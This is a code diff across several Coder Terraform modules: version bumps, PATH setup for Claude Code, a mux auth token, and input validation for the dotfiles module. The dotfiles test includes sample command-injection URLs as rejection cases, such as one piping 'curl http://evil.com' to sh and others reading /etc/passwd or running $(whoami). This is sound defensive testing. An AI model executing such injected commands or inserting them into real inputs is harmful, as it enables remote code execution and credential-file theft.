 ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_INSTALL_CLAUDE_CODE=${ARG_INSTALL_CLAUDE_CODE:-}
 ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
 ARG_INSTALL_VIA_NPM=${ARG_INSTALL_VIA_NPM:-false}
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_MCP_APP_STATUS_SLUG=${ARG_MCP_APP_STATUS_SLUG:-}
@@ -21,6 +23,8 @@ ARG_ALLOWED_TOOLS=${ARG_ALLOWED_TOOLS:-}
 ARG_DISALLOWED_TOOLS=${ARG_DISALLOWED_TOOLS:-}
 ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
 
+export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
+
 echo "--------------------------------"
 
 printf "ARG_CLAUDE_CODE_VERSION: %s\n" "$ARG_CLAUDE_CODE_VERSION"
@@ -51,39 +55,51 @@ function add_mcp_servers() {
   done < <(echo "$mcp_json" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
 }
 
+function add_path_to_shell_profiles() {
+  local path_dir="$1"
+
+  for profile in "$HOME/.profile" "$HOME/.bash_profile" "$HOME/.bashrc" "$HOME/.zprofile" "$HOME/.zshrc"; do
+    if [ -f "$profile" ]; then
+      if ! grep -q "$path_dir" "$profile" 2> /dev/null; then
+        echo "export PATH=\"\$PATH:$path_dir\"" >> "$profile"
+        echo "Added $path_dir to $profile"
+      fi
+    fi
+  done
+
+  local fish_config="$HOME/.config/fish/config.fish"
+  if [ -f "$fish_config" ]; then
+    if ! grep -q "$path_dir" "$fish_config" 2> /dev/null; then
+      echo "fish_add_path $path_dir" >> "$fish_config"
+      echo "Added $path_dir to $fish_config"
+    fi
+  fi
+}
+
 function ensure_claude_in_path() {
-  if [ -z "${CODER_SCRIPT_BIN_DIR:-}" ]; then
-    echo "CODER_SCRIPT_BIN_DIR not set, skipping PATH setup"
+  local CLAUDE_BIN=""
+  if command -v claude > /dev/null 2>&1; then
+    CLAUDE_BIN=$(command -v claude)
+  elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
+    CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
+  elif [ -x "$HOME/.local/bin/claude" ]; then
+    CLAUDE_BIN="$HOME/.local/bin/claude"
+  fi
+
+  if [ -z "$CLAUDE_BIN" ] || [ ! -x "$CLAUDE_BIN" ]; then
+    echo "Warning: Could not find claude binary"
     return
   fi
 
-  if [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
-    local CLAUDE_BIN=""
-    if command -v claude > /dev/null 2>&1; then
-      CLAUDE_BIN=$(command -v claude)
-    elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
-      CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
-    elif [ -x "$HOME/.local/bin/claude" ]; then
-      CLAUDE_BIN="$HOME/.local/bin/claude"
-    fi
+  local CLAUDE_DIR
+  CLAUDE_DIR=$(dirname "$CLAUDE_BIN")
 
-    if [ -n "$CLAUDE_BIN" ] && [ -x "$CLAUDE_BIN" ]; then
-      ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
-      echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
-    else
-      echo "Warning: Could not find claude binary to symlink"
-    fi
-  else
-    echo "Claude already available in CODER_SCRIPT_BIN_DIR"
+  if [ -n "${CODER_SCRIPT_BIN_DIR:-}" ] && [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
+    ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
+    echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
   fi
 
-  local marker="# Added by claude-code module"
-  for profile in "$HOME/.bashrc" "$HOME/.zshrc" "$HOME/.profile"; do
-    if [ -f "$profile" ] && ! grep -q "$marker" "$profile" 2> /dev/null; then
-      printf "\n%s\nexport PATH=\"%s:\$PATH\"\n" "$marker" "$CODER_SCRIPT_BIN_DIR" >> "$profile"
-      echo "Added $CODER_SCRIPT_BIN_DIR to PATH in $profile"
-    fi
-  done
+  add_path_to_shell_profiles "$CLAUDE_DIR"
 }
 
 function install_claude_code_cli() {

registry/coder/modules/claude-code/scripts/start.sh

@@ -2,6 +2,12 @@
 
 set -euo pipefail
 
+ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
+
+export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
+
 command_exists() {
   command -v "$1" > /dev/null 2>&1
 }

registry/coder/modules/cursor/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
+  version  = "1.4.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "cursor" {
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
+  version  = "1.4.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Cursor to use the GitHub MCP server with authen
 module "cursor" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/cursor/coder"
-  version  = "1.4.0"
+  version  = "1.4.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/cursor/main.tf

@@ -66,7 +66,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 

registry/coder/modules/dotfiles/README.md

@@ -18,7 +18,7 @@ Under the hood, this module uses the [coder dotfiles](https://coder.com/docs/v2/
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.3.0"
   agent_id = coder_agent.example.id
 }
 ```
@@ -31,7 +31,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.3.0"
   agent_id = coder_agent.example.id
 }
 ```
@@ -42,7 +42,7 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.3.0"
   agent_id = coder_agent.example.id
   user     = "root"
 }
@@ -54,14 +54,14 @@ module "dotfiles" {
 module "dotfiles" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/dotfiles/coder"
-  version  = "1.2.3"
+  version  = "1.3.0"
   agent_id = coder_agent.example.id
 }
 
 module "dotfiles-root" {
   count        = data.coder_workspace.me.start_count
   source       = "registry.coder.com/coder/dotfiles/coder"
-  version      = "1.2.3"
+  version      = "1.3.0"
   agent_id     = coder_agent.example.id
   user         = "root"
   dotfiles_uri = module.dotfiles.dotfiles_uri
@@ -76,7 +76,7 @@ You can set a default dotfiles repository for all users by setting the `default_
 module "dotfiles" {
   count                = data.coder_workspace.me.start_count
   source               = "registry.coder.com/coder/dotfiles/coder"
-  version              = "1.2.3"
+  version              = "1.3.0"
   agent_id             = coder_agent.example.id
   default_dotfiles_uri = "https://github.com/coder/dotfiles"
 }

registry/coder/modules/dotfiles/main.test.ts

@@ -12,20 +12,47 @@ describe("dotfiles", async () => {
     agent_id: "foo",
   });
 
-  it("default output", async () => {
+  it("default output is empty string", async () => {
     const state = await runTerraformApply(import.meta.dir, {
       agent_id: "foo",
     });
     expect(state.outputs.dotfiles_uri.value).toBe("");
   });
 
-  it("set a default dotfiles_uri", async () => {
-    const default_dotfiles_uri = "foo";
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      default_dotfiles_uri,
-    });
-    expect(state.outputs.dotfiles_uri.value).toBe(default_dotfiles_uri);
+  it("accepts valid git URL formats", async () => {
+    const validUrls = [
+      "https://github.com/coder/dotfiles",
+      "https://github.com/coder/dotfiles.git",
+      "git@github.com:coder/dotfiles.git",
+      "git://github.com/coder/dotfiles.git",
+      "ssh://git@github.com/coder/dotfiles.git",
+    ];
+    for (const url of validUrls) {
+      const state = await runTerraformApply(import.meta.dir, {
+        agent_id: "foo",
+        dotfiles_uri: url,
+      });
+      expect(state.outputs.dotfiles_uri.value).toBe(url);
+    }
+  });
+
+  it("rejects invalid or malicious URLs", async () => {
+    const invalidUrls = [
+      "https://github.com/user/repo; curl http://evil.com | sh",
+      "https://github.com/$(whoami)/repo",
+      "https://github.com/`id`/repo",
+      "https://github.com/user/repo|cat /etc/passwd",
+      "file:///etc/passwd",
+      "not-a-valid-url",
+    ];
+    for (const url of invalidUrls) {
+      await expect(
+        runTerraformApply(import.meta.dir, {
+          agent_id: "foo",
+          dotfiles_uri: url,
+        }),
+      ).rejects.toThrow();
+    }
   });
 
   it("set custom order for coder_parameter", async () => {

registry/coder/modules/dotfiles/main.tf

@@ -36,19 +36,40 @@ variable "default_dotfiles_uri" {
   type        = string
   description = "The default dotfiles URI if the workspace user does not provide one"
   default     = ""
+
+  validation {
+    condition = (
+      var.default_dotfiles_uri == "" ||
+      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@-]+$", var.default_dotfiles_uri))
+    )
+    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
+  }
 }
 
 variable "dotfiles_uri" {
   type        = string
   description = "The URL to a dotfiles repository. (optional, when set, the user isn't prompted for their dotfiles)"
+  default     = null
 
-  default = null
+  validation {
+    condition = (
+      var.dotfiles_uri == null ||
+      var.dotfiles_uri == "" ||
+      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@-]+$", var.dotfiles_uri))
+    )
+    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
+  }
 }
 
 variable "user" {
   type        = string
   description = "The name of the user to apply the dotfiles to. (optional, applies to the current user by default)"
   default     = null
+
+  validation {
+    condition     = var.user == null || can(regex("^[a-zA-Z_][a-zA-Z0-9_-]*$", var.user))
+    error_message = "Must be a valid username without special characters."
+  }
 }
 
 variable "coder_parameter_order" {
@@ -63,6 +84,12 @@ variable "manual_update" {
   default     = false
 }
 
+variable "post_clone_script" {
+  description = "Custom script to run after applying dotfiles. Runs every time, even if dotfiles were already applied."
+  type        = string
+  default     = null
+}
+
 data "coder_parameter" "dotfiles_uri" {
   count        = var.dotfiles_uri == null ? 1 : 0
   type         = "string"
@@ -73,18 +100,25 @@ data "coder_parameter" "dotfiles_uri" {
   description  = var.description
   mutable      = true
   icon         = "/icon/dotfiles.svg"
+
+  validation {
+    regex = "^$|^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@-]+$"
+    error = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
+  }
 }
 
 locals {
-  dotfiles_uri = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
-  user         = var.user != null ? var.user : ""
+  dotfiles_uri              = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
+  user                      = var.user != null ? var.user : ""
+  encoded_post_clone_script = var.post_clone_script != null ? base64encode(var.post_clone_script) : ""
 }
 
 resource "coder_script" "dotfiles" {
   agent_id = var.agent_id
   script = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user
+    DOTFILES_USER : local.user,
+    POST_CLONE_SCRIPT : local.encoded_post_clone_script
   })
   display_name = "Dotfiles"
   icon         = "/icon/dotfiles.svg"
@@ -101,7 +135,8 @@ resource "coder_app" "dotfiles" {
   group        = var.group
   command = templatefile("${path.module}/run.sh", {
     DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user
+    DOTFILES_USER : local.user,
+    POST_CLONE_SCRIPT : local.encoded_post_clone_script
   })
 }
 

registry/coder/modules/dotfiles/run.sh

@@ -5,6 +5,19 @@ set -euo pipefail
 DOTFILES_URI="${DOTFILES_URI}"
 DOTFILES_USER="${DOTFILES_USER}"
 
+# Validate DOTFILES_URI to prevent command injection (defense in depth)
+if [ -n "$DOTFILES_URI" ]; then
+  # shellcheck disable=SC2250
+  if [[ "$DOTFILES_URI" =~ [^a-zA-Z0-9._/:@-] ]]; then
+    echo "ERROR: DOTFILES_URI contains invalid characters" >&2
+    exit 1
+  fi
+  if ! [[ "$DOTFILES_URI" =~ ^(https?://|ssh://|git@|git://) ]]; then
+    echo "ERROR: DOTFILES_URI must be a valid repository URL (https://, http://, ssh://, git@, or git://)" >&2
+    exit 1
+  fi
+fi
+
 # shellcheck disable=SC2157
 if [ -n "$${DOTFILES_URI// }" ]; then
   if [ -z "$DOTFILES_USER" ]; then
@@ -16,12 +29,28 @@ if [ -n "$${DOTFILES_URI// }" ]; then
   if [ "$DOTFILES_USER" = "$USER" ]; then
     coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
   else
-    # The `eval echo ~"$DOTFILES_USER"` part is used to dynamically get the home directory of the user, see https://superuser.com/a/484280
-    # eval echo ~coder -> "/home/coder"
-    # eval echo ~root  -> "/root"
+    if command -v getent > /dev/null 2>&1; then
+      DOTFILES_USER_HOME=$(getent passwd "$DOTFILES_USER" | cut -d: -f6)
+    else
+      DOTFILES_USER_HOME=$(awk -F: -v user="$DOTFILES_USER" '$1 == user {print $6}' /etc/passwd)
+    fi
+    if [ -z "$DOTFILES_USER_HOME" ]; then
+      echo "ERROR: Could not determine home directory for user $DOTFILES_USER" >&2
+      exit 1
+    fi
 
-    CODER_BIN=$(which coder)
-    DOTFILES_USER_HOME=$(eval echo ~"$DOTFILES_USER")
-    sudo -u "$DOTFILES_USER" sh -c "'$CODER_BIN' dotfiles '$DOTFILES_URI' -y 2>&1 | tee '$DOTFILES_USER_HOME'/.dotfiles.log"
+    CODER_BIN=$(command -v coder)
+    sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
   fi
 fi
+
+POST_CLONE_SCRIPT="${POST_CLONE_SCRIPT}"
+
+if [ -n "$POST_CLONE_SCRIPT" ]; then
+  echo "Running post-clone script..."
+  POST_CLONE_TMP=$(mktemp)
+  echo "$POST_CLONE_SCRIPT" | base64 -d > "$POST_CLONE_TMP"
+  chmod +x "$POST_CLONE_TMP"
+  $POST_CLONE_TMP
+  rm "$POST_CLONE_TMP"
+fi

registry/coder/modules/git-config/README.md

@@ -14,7 +14,7 @@ Runs a script that updates git credentials in the workspace to match the user's
 module "git-config" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/git-config/coder"
-  version  = "1.0.32"
+  version  = "1.0.33"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ TODO: Add screenshot
 module "git-config" {
   count              = data.coder_workspace.me.start_count
   source             = "registry.coder.com/coder/git-config/coder"
-  version            = "1.0.32"
+  version            = "1.0.33"
   agent_id           = coder_agent.main.id
   allow_email_change = true
 }
@@ -43,7 +43,7 @@ TODO: Add screenshot
 module "git-config" {
   count                 = data.coder_workspace.me.start_count
   source                = "registry.coder.com/coder/git-config/coder"
-  version               = "1.0.32"
+  version               = "1.0.33"
   agent_id              = coder_agent.main.id
   allow_username_change = false
   allow_email_change    = false

registry/coder/modules/git-config/main.tf

@@ -44,6 +44,9 @@ data "coder_parameter" "user_email" {
   description  = "Git user.email to be used for commits. Leave empty to default to Coder user's email."
   display_name = "Git config user.email"
   mutable      = true
+  styling = jsonencode({
+    placeholder = data.coder_workspace_owner.me.email
+  })
 }
 
 data "coder_parameter" "username" {
@@ -55,6 +58,9 @@ data "coder_parameter" "username" {
   description  = "Git user.name to be used for commits. Leave empty to default to Coder user's Full Name."
   display_name = "Full Name for Git config"
   mutable      = true
+  styling = jsonencode({
+    placeholder = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
+  })
 }
 
 resource "coder_env" "git_author_name" {

registry/coder/modules/jetbrains/README.md

@@ -42,7 +42,7 @@ module "jetbrains" {
   version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
-  default  = ["PY", "IU"] # Pre-configure GoLand and IntelliJ IDEA
+  default  = ["PY", "IU"] # Pre-configure PyCharm and IntelliJ IDEA
 }
 ```
 

registry/coder/modules/jupyterlab/README.md

@@ -16,7 +16,7 @@ A module that adds JupyterLab in your Coder template.
 module "jupyterlab" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/jupyterlab/coder"
-  version  = "1.2.1"
+  version  = "1.2.2"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ JupyterLab is automatically configured to work with Coder's iframe embedding. Fo
 module "jupyterlab" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/jupyterlab/coder"
-  version  = "1.2.1"
+  version  = "1.2.2"
   agent_id = coder_agent.main.id
   config = {
     ServerApp = {

registry/coder/modules/jupyterlab/main.test.ts

@@ -77,7 +77,7 @@ describe("jupyterlab", async () => {
     expect(output.exitCode).toBe(1);
     expect(output.stdout).toEqual([
       "Checking for a supported installer",
-      "No valid installer is not installed",
+      "No supported installer found.",
       "Please install pipx or uv in your Dockerfile/VM image before running this script",
     ]);
   });

registry/coder/modules/jupyterlab/run.sh

@@ -14,7 +14,7 @@ check_available_installer() {
     INSTALLER="uv"
     return
   fi
-  echo "No valid installer is not installed"
+  echo "No supported installer found."
   echo "Please install pipx or uv in your Dockerfile/VM image before running this script"
   exit 1
 }

registry/coder/modules/kasmvnc/README.md

@@ -14,7 +14,7 @@ Automatically install [KasmVNC](https://kasmweb.com/kasmvnc) in a workspace, and
 module "kasmvnc" {
   count               = data.coder_workspace.me.start_count
   source              = "registry.coder.com/coder/kasmvnc/coder"
-  version             = "1.2.7"
+  version             = "1.3.0"
   agent_id            = coder_agent.example.id
   desktop_environment = "xfce"
   subdomain           = true

registry/coder/modules/kasmvnc/main.tf

@@ -54,6 +54,15 @@ variable "subdomain" {
   description = "Is subdomain sharing enabled in your cluster?"
 }
 
+variable "share" {
+  type    = string
+  default = "owner"
+  validation {
+    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
+    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
+  }
+}
+
 resource "coder_script" "kasm_vnc" {
   agent_id     = var.agent_id
   display_name = "KasmVNC"
@@ -75,7 +84,7 @@ resource "coder_app" "kasm_vnc" {
   url          = "http://localhost:${var.port}"
   icon         = "/icon/kasmvnc.svg"
   subdomain    = var.subdomain
-  share        = "owner"
+  share        = var.share
   order        = var.order
   group        = var.group
 

registry/coder/modules/kiro/README.md

@@ -18,7 +18,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -31,7 +31,7 @@ module "kiro" {
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -47,7 +47,7 @@ The following example configures Kiro to use the GitHub MCP server with authenti
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/kiro/main.tf

@@ -53,7 +53,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 

registry/coder/modules/mux/README.md

@@ -14,7 +14,7 @@ Automatically install and run [Mux](https://github.com/coder/mux) in a Coder wor
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.8"
+  version  = "1.1.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -37,7 +37,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.8"
+  version  = "1.1.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -48,7 +48,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.8"
+  version  = "1.1.0"
   agent_id = coder_agent.main.id
   # Default is "latest"; set to a specific version to pin
   install_version = "0.4.0"
@@ -63,7 +63,7 @@ Start Mux with `mux server --add-project /path/to/project`:
 module "mux" {
   count       = data.coder_workspace.me.start_count
   source      = "registry.coder.com/coder/mux/coder"
-  version     = "1.0.8"
+  version     = "1.1.0"
   agent_id    = coder_agent.main.id
   add-project = "/path/to/project"
 }
@@ -75,7 +75,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.8"
+  version  = "1.1.0"
   agent_id = coder_agent.main.id
   port     = 8080
 }
@@ -89,7 +89,7 @@ Run an existing copy of Mux if found, otherwise install from npm:
 module "mux" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/mux/coder"
-  version    = "1.0.8"
+  version    = "1.1.0"
   agent_id   = coder_agent.main.id
   use_cached = true
 }
@@ -103,7 +103,7 @@ Run without installing from the network (requires Mux to be pre-installed):
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.8"
+  version  = "1.1.0"
   agent_id = coder_agent.main.id
   install  = false
 }

registry/coder/modules/mux/main.tf

@@ -7,6 +7,10 @@ terraform {
       source  = "coder/coder"
       version = ">= 2.5"
     }
+    random = {
+      source  = "hashicorp/random"
+      version = ">= 3.0"
+    }
   }
 }
 
@@ -113,6 +117,22 @@ variable "open_in" {
   }
 }
 
+# Per-module auth token for cross-site request protection.
+# We pass this token into each mux process at launch time (process-scoped env)
+# and include it in the app URL query string (?token=...).
+#
+# Why process-scoped env instead of a shared coder_env value:
+# multiple mux module instances can target the same agent (different slug/port).
+# A single global MUX_SERVER_AUTH_TOKEN env key would cause collisions.
+resource "random_password" "mux_auth_token" {
+  length  = 64
+  special = false
+}
+
+locals {
+  mux_auth_token = random_password.mux_auth_token.result
+}
+
 resource "coder_script" "mux" {
   agent_id     = var.agent_id
   display_name = var.display_name
@@ -125,6 +145,7 @@ resource "coder_script" "mux" {
     INSTALL_PREFIX : var.install_prefix,
     OFFLINE : !var.install,
     USE_CACHED : var.use_cached,
+    AUTH_TOKEN : local.mux_auth_token,
   })
   run_on_start = true
 
@@ -140,7 +161,7 @@ resource "coder_app" "mux" {
   agent_id     = var.agent_id
   slug         = var.slug
   display_name = var.display_name
-  url          = "http://localhost:${var.port}"
+  url          = "http://localhost:${var.port}?token=${local.mux_auth_token}"
   icon         = "/icon/mux.svg"
   subdomain    = var.subdomain
   share        = var.share
@@ -154,5 +175,3 @@ resource "coder_app" "mux" {
     threshold = 6
   }
 }
-
-

registry/coder/modules/mux/mux.tftest.hcl

@@ -20,8 +20,10 @@ run "install_false_and_use_cached_conflict" {
   ]
 }
 
+# Needs command = apply because the URL contains random_password.result,
+# which is unknown during plan.
 run "custom_port" {
-  command = plan
+  command = apply
 
   variables {
     agent_id = "foo"
@@ -29,8 +31,51 @@ run "custom_port" {
   }
 
   assert {
-    condition     = resource.coder_app.mux.url == "http://localhost:8080"
-    error_message = "coder_app URL must use the configured port"
+    condition     = startswith(resource.coder_app.mux.url, "http://localhost:8080?token=")
+    error_message = "coder_app URL must use the configured port and include auth token"
+  }
+
+  assert {
+    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:8080?token=") == random_password.mux_auth_token.result
+    error_message = "URL token must match the generated auth token"
+  }
+}
+
+# Needs command = apply because random_password.result is unknown during plan.
+run "auth_token_in_server_script" {
+  command = apply
+
+  variables {
+    agent_id = "foo"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "MUX_SERVER_AUTH_TOKEN=")
+    error_message = "mux launch script must set MUX_SERVER_AUTH_TOKEN"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, random_password.mux_auth_token.result)
+    error_message = "mux launch script must use the generated auth token"
+  }
+}
+
+# Needs command = apply because random_password.result is unknown during plan.
+run "auth_token_in_url" {
+  command = apply
+
+  variables {
+    agent_id = "foo"
+  }
+
+  assert {
+    condition     = startswith(resource.coder_app.mux.url, "http://localhost:4000?token=")
+    error_message = "coder_app URL must include auth token query parameter"
+  }
+
+  assert {
+    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:4000?token=") == random_password.mux_auth_token.result
+    error_message = "URL token must match the generated auth token"
   }
 }
 
@@ -62,5 +107,3 @@ run "use_cached_only_success" {
     use_cached = true
   }
 }
-
-

registry/coder/modules/mux/run.sh

@@ -9,7 +9,9 @@ function run_mux() {
   rm -f "$HOME/.mux/server.lock"
 
   local port_value
+  local auth_token_value
   port_value="${PORT}"
+  auth_token_value="${AUTH_TOKEN}"
   if [ -z "$port_value" ]; then
     port_value="4000"
   fi
@@ -20,7 +22,7 @@ function run_mux() {
   fi
   echo "🚀 Starting mux server on port $port_value..."
   echo "Check logs at ${LOG_PATH}!"
-  PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
+  MUX_SERVER_AUTH_TOKEN="$auth_token_value" PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
 }
 
 # Check if mux is already installed for offline mode

registry/coder/modules/vscode-desktop-core/README.md

@@ -16,15 +16,15 @@ The VSCode Desktop Core module is a building block for modules that need to expo
 ```tf
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.1"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 
-  web_app_icon         = "/icon/code.svg"
-  web_app_slug         = "vscode"
-  web_app_display_name = "VS Code Desktop"
-  web_app_order        = var.order
-  web_app_group        = var.group
+  coder_app_icon         = "/icon/code.svg"
+  coder_app_slug         = "vscode"
+  coder_app_display_name = "VS Code Desktop"
+  coder_app_order        = var.order
+  coder_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/vscode-desktop-core/main.test.ts

@@ -11,9 +11,9 @@ const appName = "vscode-desktop";
 const defaultVariables = {
   agent_id: "foo",
 
-  web_app_icon: "/icon/code.svg",
-  web_app_slug: "vscode",
-  web_app_display_name: "VS Code Desktop",
+  coder_app_icon: "/icon/code.svg",
+  coder_app_slug: "vscode",
+  coder_app_display_name: "VS Code Desktop",
 
   protocol: "vscode",
 };
@@ -99,16 +99,16 @@ describe("vscode-desktop-core", async () => {
       );
 
       expect(coder_app?.instances[0].attributes.slug).toBe(
-        defaultVariables.web_app_slug,
+        defaultVariables.coder_app_slug,
       );
       expect(coder_app?.instances[0].attributes.display_name).toBe(
-        defaultVariables.web_app_display_name,
+        defaultVariables.coder_app_display_name,
       );
     });
 
     it("sets order", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        web_app_order: "5",
+        coder_app_order: "5",
 
         ...defaultVariables,
       });
@@ -122,7 +122,7 @@ describe("vscode-desktop-core", async () => {
 
     it("sets group", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        web_app_group: "web-app-group",
+        coder_app_group: "web-app-group",
 
         ...defaultVariables,
       });

registry/coder/modules/vscode-desktop-core/main.tf

@@ -31,28 +31,28 @@ variable "protocol" {
   description = "The URI protocol the IDE."
 }
 
-variable "web_app_icon" {
+variable "coder_app_icon" {
   type        = string
   description = "The icon of the coder_app."
 }
 
-variable "web_app_slug" {
+variable "coder_app_slug" {
   type        = string
   description = "The slug of the coder_app."
 }
 
-variable "web_app_display_name" {
+variable "coder_app_display_name" {
   type        = string
   description = "The display name of the coder_app."
 }
 
-variable "web_app_order" {
+variable "coder_app_order" {
   type        = number
   description = "The order of the coder_app."
   default     = null
 }
 
-variable "web_app_group" {
+variable "coder_app_group" {
   type        = string
   description = "The group of the coder_app."
   default     = null
@@ -65,12 +65,12 @@ resource "coder_app" "vscode-desktop" {
   agent_id = var.agent_id
   external = true
 
-  icon         = var.web_app_icon
-  slug         = var.web_app_slug
-  display_name = var.web_app_display_name
+  icon         = var.coder_app_icon
+  slug         = var.coder_app_slug
+  display_name = var.coder_app_display_name
 
-  order = var.web_app_order
-  group = var.web_app_group
+  order = var.coder_app_order
+  group = var.coder_app_group
 
   url = join("", [
     var.protocol,

registry/coder/modules/vscode-desktop/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "vscode" {
